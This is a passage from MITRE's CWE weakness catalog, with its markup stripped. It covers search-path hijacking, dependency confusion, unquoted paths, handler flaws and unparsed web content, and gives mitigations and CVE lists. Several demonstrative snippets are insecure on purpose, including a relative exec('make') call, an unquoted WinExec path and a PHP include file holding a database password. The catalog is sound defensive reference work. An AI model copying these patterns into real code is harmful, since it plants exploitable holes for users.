MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors. + + Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as "/tmp" or the current working directory. + In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled: + + the directory from which the program has been loaded + the current working directory + + In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used. + One or more locations in that path could include the Windows drive root or its subdirectories. This often exists in Linux-based code assuming the controlled nature of the root directory (/) or its subdirectories (/etc, etc), or a code that recursively accesses the parent directory. In Windows, the drive root and some of its subdirectories have weak permissions by default, which makes them uncontrolled. + In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element. + In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element. + + + + + + + + + + + + DLL preloading + This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. + + + Binary planting + This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. + + + Insecure library loading + This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. + + + Dependency confusion + As of February 2021, this term is used to describe CWE-427 in the context of managing installation of software package dependencies, in which attackers release packages on public sites where the names are the same as package names used by private repositories, and the search for the dependent package tries the public site first, downloading untrusted code. It may also be referred to as a "substitution attack." + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + Attack Surface Reduction + Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428. + + + Implementation + Attack Surface Reduction + When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths. + + + Implementation + Attack Surface Reduction + Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths. + + + Implementation + Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. Since this is a denylist approach, it might not be a complete solution. + + + Implementation + Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of finding the program using the PATH environment variable, while execl() and execv() require a full path. + + + + + The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. + + ...System.Runtime.getRuntime().exec("make");... + + The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. + + + In versions of Go prior to v1.19, the LookPath function would follow the conventions of the runtime OS and look for a program in the directiories listed in the current path [REF-1325]. + Therefore, Go would prioritize searching the current directory when the provided command name does not contain a directory separator and continued to search for programs even when the specified program name is empty. + Consider the following where an application executes a git command to run on the system. + + func ExecuteGitCommand(name string, arg []string) error { + + c := exec.Command(name, arg...) + var err error + c.Path, err = exec.LookPath(name) + if err != nil { + + return err + + } + } + + An attacker could create a malicious repository with a file named ..exe and another file named git.exe. If git.exe is not found in the system PATH, then ..exe would execute [REF-1326]. + + + In February 2021 [REF-1169], a researcher was able to demonstrate the ability to breach major technology companies by using "dependency confusion" where the companies would download and execute untrusted packages. + The researcher discovered the names of some internal, private packages by looking at dependency lists in public source code, such as package.json. The researcher then created new, untrusted packages with the same name as the internal packages, then uploaded them to package hosting services. These services included the npm registry for Node, PyPi for Python, and RubyGems. In affected companies, their dependency resolution would search the public hosting services first before consulting their internal service, causing the untrusted packages to be automatically downloaded and executed. + + + + + CVE-2022-4826 + Go-based git extension on Windows can search for and execute a malicious "..exe" in a repository because Go searches the current working directory if git.exe is not found in the PATH + https://www.cve.org/CVERecord?id=CVE-2022-4826 + + + CVE-2020-26284 + A Static Site Generator built in Go, when running on Windows, searches the current working directory for a command, possibly allowing code execution using a malicious .exe or .bat file with the name being searched + https://www.cve.org/CVERecord?id=CVE-2020-26284 + + + CVE-2022-24765 + Windows-based fork of git creates a ".git" folder in the C: drive, allowing local attackers to create a .git folder with a malicious config file + https://www.cve.org/CVERecord?id=CVE-2022-24765 + + + CVE-2019-1552 + SSL package searches under "C:/usr/local" for configuration files and other critical data, but C:/usr/local might be world-writable. + https://www.cve.org/CVERecord?id=CVE-2019-1552 + + + CVE-2010-3402 + "DLL hijacking" issue in document editor. + https://www.cve.org/CVERecord?id=CVE-2010-3402 + + + CVE-2010-3397 + "DLL hijacking" issue in encryption software. + https://www.cve.org/CVERecord?id=CVE-2010-3397 + + + CVE-2010-3138 + "DLL hijacking" issue in library used by multiple media players. + https://www.cve.org/CVERecord?id=CVE-2010-3138 + + + CVE-2010-3152 + "DLL hijacking" issue in illustration program. + https://www.cve.org/CVERecord?id=CVE-2010-3152 + + + CVE-2010-3147 + "DLL hijacking" issue in address book. + https://www.cve.org/CVERecord?id=CVE-2010-3147 + + + CVE-2010-3135 + "DLL hijacking" issue in network monitoring software. + https://www.cve.org/CVERecord?id=CVE-2010-3135 + + + CVE-2010-3131 + "DLL hijacking" issue in web browser. + https://www.cve.org/CVERecord?id=CVE-2010-3131 + + + CVE-2010-1795 + "DLL hijacking" issue in music player/organizer. + https://www.cve.org/CVERecord?id=CVE-2010-1795 + + + CVE-2002-1576 + Product uses the current working directory to find and execute a program, which allows local users to gain privileges by creating a symlink that points to a malicious version of the program. + https://www.cve.org/CVERecord?id=CVE-2002-1576 + + + CVE-1999-1461 + Product trusts the PATH environmental variable to find and execute a program, which allows local users to obtain root access by modifying the PATH to point to a malicous version of that program. + https://www.cve.org/CVERecord?id=CVE-1999-1461 + + + CVE-1999-1318 + Software uses a search path that includes the current working directory (.), which allows local users to gain privileges via malicious programs. + https://www.cve.org/CVERecord?id=CVE-1999-1318 + + + CVE-2003-0579 + Admin software trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user. + https://www.cve.org/CVERecord?id=CVE-2003-0579 + + + CVE-2000-0854 + When a document is opened, the directory of that document is first used to locate DLLs , which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document. + https://www.cve.org/CVERecord?id=CVE-2000-0854 + + + CVE-2001-0943 + Database trusts the PATH environment variable to find and execute programs, which allows local users to modify the PATH to point to malicious programs. + https://www.cve.org/CVERecord?id=CVE-2001-0943 + + + CVE-2001-0942 + Database uses an environment variable to find and execute a program, which allows local users to execute arbitrary programs by changing the environment variable. + https://www.cve.org/CVERecord?id=CVE-2001-0942 + + + CVE-2001-0507 + Server uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a malicious file. + https://www.cve.org/CVERecord?id=CVE-2001-0507 + + + CVE-2002-2017 + Product allows local users to execute arbitrary code by setting an environment variable to reference a malicious program. + https://www.cve.org/CVERecord?id=CVE-2002-2017 + + + CVE-1999-0690 + Product includes the current directory in root's PATH variable. + https://www.cve.org/CVERecord?id=CVE-1999-0690 + + + CVE-2001-0912 + Error during packaging causes product to include a hard-coded, non-standard directory in search path. + https://www.cve.org/CVERecord?id=CVE-2001-0912 + + + CVE-2001-0289 + Product searches current working directory for configuration file. + https://www.cve.org/CVERecord?id=CVE-2001-0289 + + + CVE-2005-1705 + Product searches current working directory for configuration file. + https://www.cve.org/CVERecord?id=CVE-2005-1705 + + + CVE-2005-1307 + Product executable other program from current working directory. + https://www.cve.org/CVERecord?id=CVE-2005-1307 + + + CVE-2002-2040 + Untrusted path. + https://www.cve.org/CVERecord?id=CVE-2002-2040 + + + CVE-2005-2072 + Modification of trusted environment variable leads to untrusted path vulnerability. + https://www.cve.org/CVERecord?id=CVE-2005-2072 + + + CVE-2005-1632 + Product searches /tmp for modules before other paths. + https://www.cve.org/CVERecord?id=CVE-2005-1632 + + + + + Uncontrolled Search Path Element + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control). + This weakness is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model might need enhancement or clarification. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Maintenance_Notes, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Observed_Examples, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms, Description, Maintenance_Notes, References, Theoretical_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Anonymous External Contributor + 2022-05-24 + provided observed examples and descriptions for Windows drive root + + + + + The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. + If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec. + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Implementation + Properly quote the full search path before executing a program on the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + The following example demonstrates the weakness. + + UINT errCode = WinExec( "C:\\Program Files\\Foo\\Bar", SW_SHOW ); + + + + + + CVE-2005-1185 + Small handful of others. Program doesn't quote the "C:\Program Files\" path when calling a program to be executed - or any other path with a directory or file whose name contains a space - so attacker can put a malicious program.exe into C:. + https://www.cve.org/CVERecord?id=CVE-2005-1185 + + + CVE-2005-2938 + CreateProcess() and CreateProcessAsUser() can be misused by applications to allow "program.exe" style attacks in C: + https://www.cve.org/CVERecord?id=CVE-2005-2938 + + + CVE-2000-1128 + Applies to "Common Files" folder, with a malicious common.exe, instead of "Program Files"/program.exe. + https://www.cve.org/CVERecord?id=CVE-2000-1128 + + + + Program Invocation + + + + Unquoted Search Path or Element + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This weakness could apply to any OS that supports spaces in filenames, especially any OS that make it easy for a user to insert spaces into filenames or folders, such as Windows. While spaces are technically supported in Unix, the practice is generally avoided. . + + + This weakness primarily involves the lack of quoting, which is not explicitly stated as a part of CWE-116. CWE-116 also describes output in light of structured messages, but the generation of a filename or search path (as in this weakness) might not be considered a structured message. + An additional complication is the relationship to control spheres. Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere, this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control. This is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model needs enhancement or clarification. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Applicable_Platforms, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts path input in the form of multiple trailing dot ('filedir....') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + BUGTRAQ:20040205 + Apache + Resin Reveals JSP Source Code ... + http://marc.info/?l=bugtraq&m=107605633904122&w=2 + + + CVE-2004-0281 + Multiple trailing dot allows directory listing + https://www.cve.org/CVERecord?id=CVE-2004-0281 + + + + + Multiple Trailing Dot - 'filedir....' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Trailing Dot - 'filedir....' + + + + The wrong "handler" is assigned to process an object. + An example of deploying the wrong handler would be calling a servlet to reveal source code of a .JSP file, or automatically "determining" type of the object even if it is contradictory to an explicitly specified type. + + + + + + + + Resultant + This weakness is usually resultant from other weaknesses. + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + Architecture and Design + Perform a type check before interpreting an object. + + + Architecture and Design + Reject any inconsistent types, such as a file with a .GIF extension that appears to consist of PHP code. + + + + + CVE-2001-0004 + Source code disclosure via manipulated file extension that causes parsing by wrong DLL. + https://www.cve.org/CVERecord?id=CVE-2001-0004 + + + CVE-2002-0025 + Web browser does not properly handle the Content-Type header field, causing a different application to process the document. + https://www.cve.org/CVERecord?id=CVE-2002-0025 + + + CVE-2000-1052 + Source code disclosure by directly invoking a servlet. + https://www.cve.org/CVERecord?id=CVE-2000-1052 + + + CVE-2002-1742 + Arbitrary Perl functions can be loaded by calling a non-existent function that activates a handler. + https://www.cve.org/CVERecord?id=CVE-2002-1742 + + + + + Improper Handler Deployment + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Handler Deployment + + + + A handler is not available or implemented. + When an exception is thrown and not caught, the process has given up an opportunity to decide if a given failure or event is worth a change in execution. + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Handle all possible situations (e.g. error condition). + + + Implementation + If an operation can throw an Exception, implement a handler for that specific exception. + + + + + If a Servlet does not catch all exceptions, it may reveal debugging information that will help an adversary form a plan of attack. In the following method a DNS lookup failure will cause the Servlet to throw an exception. + + protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} + + When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. + + + + + Missing Handler + + + SFP4 + Unchecked Status Condition + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running. + During the execution of a signal handler, it can be interrupted by another handler when a different signal is sent. If the two handlers share state - such as global variables - then an attacker can corrupt the state by sending another signal before the first handler has completed execution. + + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + + + + + Implementation + Turn off dangerous handlers when performing sensitive operations. + + + + + SIG00-C + Mask signals handled by noninterruptible signal handlers + + + Dangerous handler not cleared/disabled during sensitive operations + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Dangerous Handler not Cleared/Disabled During Sensitive Operations + Dangerous Handler not Disabled During Sensitive Operations + + + + The product stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server. + If code is stored in a file with an extension such as ".inc" or ".pl", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components. + + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + + + + + Architecture and Design + Perform a type check before interpreting files. + + + Architecture and Design + Do not store sensitive information in files which may be misinterpreted. + + + + + The following code uses an include file to store database credentials: + database.inc + + <?php$dbName = 'usersDB';$dbPassword = 'skjdh#67nkjd3$3$';?> + + login.php + + <?phpinclude('database.inc');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?> + + If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password. + + + + + CVE-2002-1886 + ".inc" file stored under web document root and returned unparsed by the server + https://www.cve.org/CVERecord?id=CVE-2002-1886 + + + CVE-2002-2065 + ".inc" file stored under web document root and returned unparsed by the server + https://www.cve.org/CVERecord?id=CVE-2002-2065 + + + CVE-2005-2029 + ".inc" file stored under web document root and returned unparsed by the server + https://www.cve.org/CVERecord?id=CVE-2005-2029 + + + CVE-2001-0330 + direct request to .pl file leaves it unparsed + https://www.cve.org/CVERecord?id=CVE-2001-0330 + + + CVE-2002-0614 + .inc file + https://www.cve.org/CVERecord?id=CVE-2002-0614 + + + CVE-2004-2353 + unparsed config.conf file + https://www.cve.org/CVERecord?id=CVE-2004-2353 + + + CVE-2007-3365 + Chain: uppercase file extensions causes web server to return script source code instead of executing the script. + https://www.cve.org/CVERecord?id=CVE-2007-3365 + + + + + Unparsed Raw Web Content Delivery + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. + + + + + + + + + + Primary + This can be primary when there is no check at all. + + + Resultant + This is frequently resultant when use of double extensions (e.g. ".php.gif") bypasses a sanity check. + + + Resultant + This can be resultant from client-side enforcement (CWE-602); some products will include web script in web clients to check the filename, without verifying on the server side. + + + + + + + + + + + Unrestricted File Upload + Used in vulnerability databases and elsewhere, but it is insufficiently precise. The phrase could be interpreted as the lack of restrictions on the size or number of uploaded files, which is a resource consumption issue. + + + + + Implementation + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Medium + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Arbitrary code execution is possible if an uploaded file is interpreted and executed as code by the recipient. This is especially true for .asp and .php extensions uploaded to web servers because these file types are often treated as automatically executable, even when file system permissions do not specify execution. For example, in Unix environments, programs typically cannot run unless the execute bit is set, but PHP programs may be executed by the web server without directly invoking them on the operating system. + + + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423] + + + Architecture and Design + Enforcement by Conversion + When the set of acceptable objects, such 